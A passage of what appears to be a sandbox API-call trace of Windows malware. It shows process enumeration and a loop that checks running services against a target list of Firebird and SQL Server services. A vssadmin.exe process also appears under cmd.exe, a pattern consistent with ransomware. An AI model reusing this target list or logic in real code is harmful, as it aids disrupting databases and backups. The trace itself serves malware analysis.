lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0315.783] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0315.783] lstrlenW (lpString="Themes") returned 6 [0315.783] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0315.783] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0315.783] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0315.783] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0315.783] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0315.784] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0315.784] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0315.784] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0315.784] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0315.784] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0315.784] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41539d8 | out: hHeap=0x470000) returned 1 [0315.784] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x53c [0315.790] Process32FirstW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0315.790] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0315.791] lstrlenW (lpString="System") returned 6 [0315.791] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0315.950] lstrlenW (lpString="smss.exe") returned 8 [0315.950] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0315.951] lstrlenW (lpString="csrss.exe") returned 9 [0315.951] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0315.952] lstrlenW (lpString="wininit.exe") returned 11 [0315.952] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0315.953] lstrlenW (lpString="csrss.exe") returned 9 [0315.953] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0315.953] lstrlenW (lpString="winlogon.exe") returned 12 [0315.953] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0315.954] lstrlenW (lpString="services.exe") returned 12 [0315.954] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0315.955] lstrlenW (lpString="lsass.exe") returned 9 [0315.955] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0315.955] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0315.955] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0315.956] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0315.956] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.957] lstrlenW (lpString="svchost.exe") returned 11 [0315.957] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.958] lstrlenW (lpString="svchost.exe") returned 11 [0315.958] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0315.959] lstrlenW (lpString="dwm.exe") returned 7 [0315.959] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.960] lstrlenW (lpString="svchost.exe") returned 11 [0315.960] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.961] lstrlenW (lpString="svchost.exe") returned 11 [0315.961] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x42, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.961] lstrlenW (lpString="svchost.exe") returned 11 [0315.962] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.962] lstrlenW (lpString="svchost.exe") returned 11 [0315.962] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.963] lstrlenW (lpString="svchost.exe") returned 11 [0315.963] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.966] lstrlenW (lpString="svchost.exe") returned 11 [0315.966] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.967] lstrlenW (lpString="svchost.exe") returned 11 [0315.967] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.968] lstrlenW (lpString="svchost.exe") returned 11 [0315.968] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.968] lstrlenW (lpString="svchost.exe") returned 11 [0315.968] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.969] lstrlenW (lpString="svchost.exe") returned 11 [0315.969] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0315.969] lstrlenW (lpString="spoolsv.exe") returned 11 [0315.970] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.970] lstrlenW (lpString="svchost.exe") returned 11 [0315.970] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0315.971] lstrlenW (lpString="audiodg.exe") returned 11 [0315.971] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0315.971] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0315.971] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0315.972] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0315.972] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0315.973] lstrlenW (lpString="Memory Compression") returned 18 [0315.973] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0315.974] lstrlenW (lpString="sihost.exe") returned 10 [0315.974] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.974] lstrlenW (lpString="svchost.exe") returned 11 [0315.974] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0315.975] lstrlenW (lpString="taskhostw.exe") returned 13 [0315.975] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0315.976] lstrlenW (lpString="explorer.exe") returned 12 [0315.976] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0315.977] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0315.977] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0315.977] lstrlenW (lpString="SearchUI.exe") returned 12 [0315.977] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0315.978] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0315.978] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0315.979] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0315.979] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0315.980] lstrlenW (lpString="wdgmug.exe") returned 10 [0315.980] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0315.981] lstrlenW (lpString="cmd.exe") returned 7 [0315.981] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0315.981] lstrlenW (lpString="conhost.exe") returned 11 [0315.981] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0315.982] lstrlenW (lpString="vssadmin.exe") returned 12 [0315.982] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0315.983] lstrlenW (lpString="consent.exe") returned 11 [0315.983] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 0 [0315.983] CloseHandle (hObject=0x53c) returned 1 [0315.984] Sleep (dwMilliseconds=0x1f4) [0316.725] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a418 [0316.726] EnumServicesStatusExW (in: hSCManager=0x401a418, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0316.727] GetLastError () returned 0xea [0316.727] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c30) returned 0x41539d8 [0316.728] EnumServicesStatusExW (in: hSCManager=0x401a418, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x41539d8, cbBufSize=0x1c30, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x41539d8, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0316.730] CloseServiceHandle (hSCObject=0x401a418) returned 1 [0316.730] lstrlenW (lpString="Appinfo") returned 7 [0316.730] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0316.730] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0316.730] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0316.730] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0316.730] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0316.730] lstrlenW (lpString="AppXSvc") returned 7 [0316.731] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0316.731] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0316.731] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0316.731] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0316.731] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0316.731] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0316.731] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0316.731] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0316.731] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0316.731] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0316.731] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0316.731] lstrlenW (lpString="Audiosrv") returned 8 [0316.731] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0316.731] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0316.731] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0316.731] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0316.731] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0316.731] lstrlenW (lpString="BFE") returned 3 [0316.731] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0316.731] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0316.731] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0316.731] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0316.732] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0316.732] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0316.732] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0316.732] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0316.732] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0316.732] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0316.732] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0316.732] lstrlenW (lpString="CDPSvc") returned 6 [0316.732] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0316.732] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0316.732] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0316.732] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0316.732] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0316.732] lstrlenW (lpString="ClickToRunSvc") returned 13 [0316.732] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0316.732] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0316.732] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0316.732] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0316.732] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0316.732] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0316.732] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0316.732] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0316.732] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0316.732] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0316.733] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0316.733] lstrlenW (lpString="CryptSvc") returned 8 [0316.733] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0316.733] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0316.733] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0316.733] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0316.733] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0316.733] lstrlenW (lpString="DcomLaunch") returned 10 [0316.733] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0316.733] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0316.733] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0316.733] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0316.733] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0316.733] lstrlenW (lpString="DeviceAssociationService") returned 24 [0316.733] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0316.733] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0316.733] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0316.733] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0316.733] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0316.733] lstrlenW (lpString="Dhcp") returned 4 [0316.733] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0316.733] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0316.733] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0316.733] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0316.733] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0316.734] lstrlenW (lpString="Dnscache") returned 8 [0316.734] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0316.734] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0316.734] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0316.734] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0316.734] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0316.734] lstrlenW (lpString="DPS") returned 3 [0316.734] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0316.734] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0316.734] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0316.734] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0316.734] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0316.734] lstrlenW (lpString="DusmSvc") returned 7 [0316.734] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0316.734] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0316.734] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0316.734] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0316.734] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0316.734] lstrlenW (lpString="EventLog") returned 8 [0316.734] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", 